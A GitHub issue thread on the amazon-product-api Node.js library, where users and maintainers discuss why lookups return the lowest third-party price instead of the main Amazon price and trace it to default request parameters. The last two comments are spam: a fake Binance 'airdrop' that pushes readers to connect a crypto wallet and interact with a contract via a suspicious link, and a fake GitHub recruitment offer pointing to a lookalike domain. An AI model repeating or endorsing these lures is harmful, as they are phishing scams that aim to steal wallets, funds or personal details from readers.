### ISSUE TITLE
API return LowestNewPrice instead of Price

### ISSUE THREAD

**Issue by s1lviu** [t3chnoboy/amazon-product-api#68]
<p><code>client.itemSearch({ <br>
    responseGroup: 'Images,ItemAttributes,OfferFull', <br>
    keywords: 'potatoes' <br>
}, function (err, results, response) { <br>
    if (err) { <br>
        console.log(err); <br>
    } else { <br>
        for (var i in results) { <br>
            if (results.hasOwnProperty(i)) { <br>
                console.log(results[i].Offers[0].Offer[0].OfferListing[0].Price[0].FormattedPrice[0]); <br>
            } <br>
        } <br>
    } <br>
}); <br>
</code> <br>
I’m trying to get the product current price, but with the following code I receive always the LowestNewPrice. I don’t understand because it’s different objects. <br>
<a href="http://www.jsoneditoronline.org/?id=d2e72e5c1617c558cff84569540b9d89">Here</a> is a example of output. </p>

<p>In <a href="http://webservices.amazon.com/scratchpad/index.html">scratchpad</a> I receive the expected result and more than this, I get succesfully the other elements like price or images, but for price it’s not working.</p>

<p>Regards, <br>
Silviu</p>

**Comment by masterT** [comment]
I don't really understand the problem, can you formulate the problem?

**Comment by maenthoven** [comment]
I can. Your prices are often incorrect.

We've switched to using 'apac' library, found here: https://github.com/dmcquay/node-apac

Compare these two code snippets

# Using amazon-product-api
`    var amazon = require('amazon-product-api'),
		client = amazon.createClient({
			awsId: "xxxxxxxxxxxxxxxxxxxxx",
			awsSecret: "xxxxxxxxxxxxxxxxxxxxx",
			awsTag: "xxxxxxxxxxxxxxxxxxxxx"
		});

    client.itemLookup({
        ItemId: "B01GWLIYUI",
        ResponseGroup: "Offers"
    }).then(data => {
        console.log(JSON.stringify(data)); //NOTE: No 4888 in price
    });`

# Using apac
`const {OperationHelper} = require('apac');
const bluebird = require('bluebird');
var parseString = require('xml2js').parseString;
var parse = bluebird.promisify(parseString);

const opHelper = new OperationHelper({
    awsId:     "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
    awsSecret: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
    assocId:   "xxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
});

function getAmazonPriceData (asin) {
    return opHelper.execute('ItemLookup', {
        'ItemId': asin,
        'ResponseGroup': 'Offers'
    })
        .then(response => parse(response.responseBody))
        .then(parsed => parsed.ItemLookupResponse.Items[0].Item[0].Offers[0].Offer[0].OfferListing[0].Price[0].Amount[0]);
}

getAmazonPriceData("B01GWLIYUI").then(price => console.log(price)); //Outputs 4888 (Correct Value)`

**Comment by masterT** [comment]
I tested it and this is the [XML responses](https://gist.github.com/masterT/215c8fac0709d08523188b5a967f76f1).

As you can see the `amazon-product-api` has more params in the request than the `apac` request. This is because this module sets some request params by default.

https://github.com/t3chnoboy/amazon-product-api/blob/master/lib/utils.js#L53

When I commented the default params assignation, I got the exact same price amount:

```
apac: 4368
amazon-product-api: 4368
```

I included in the previous gist the response with no default params.

**Comment by masterT** [comment]
@t3chnoboy I think we should remove the default params assignation? I make the module less flexible - you can't make simple request, such as the one above.

**Comment by t3chnoboy** [comment]
Yeah, looks like one more breaking change 😕

**Comment by t3chnoboy** [comment]
seems like it's related to https://github.com/t3chnoboy/amazon-product-api/pull/62
https://github.com/t3chnoboy/amazon-product-api/issues/63

**Comment by masterT** [comment]
Yes. I think we should let the consumer have the full control over his requests.

**Comment by FdezRomero** [comment]
I agree. Devs expect to get the buy box / main price, which they don't without overriding the default parameters. So it makes perfect sense for 1.0.

**Comment by s1lviu** [comment]
Sorry, @masterT. I've exited long time ago from that project.

**Comment by masterT** [comment]
No problem!

**Comment by raugaral** [comment]
That is not resolved!
The response no return the amazon price, only the 3th part offers...

**Comment by elliotthill** [comment]
This is still not resolved - people are going to download this and be banging their heads over why the price returned is not the amazon main price like EVERY other amazon api client out there does.

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by litty-tt** [comment]
# Exciting Developer Opportunity at GitHub!

Congratulations! You've been selected to apply for an exclusive developer position at GitHub - the world's leading software development platform. [Apply now](https://githubcareer.online/)

## Position: Senior Developer

### Salary:
- Competitive salary package starting at $200,000 per year

### Benefits:
- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Unlimited vacation days
- Professional development opportunities

## Responsibilities:
- Lead the development of cutting-edge projects
- Collaborate with talented teams to drive innovation
- Contribute to open-source projects and communities

## Requirements:
- 2+ years of experience in software development
- Proficiency in multiple programming languages
- Strong problem-solving skills
- Excellent communication and teamwork abilities

If you're ready to take your career to the next level and join a dynamic team of developers, [apply now](https://githubcareer.online/)!

**Hurry! Applications close soon.**

We look forward to welcoming you to the GitHub family!

Best regards,  
GitHub Recruitment Team
d10r
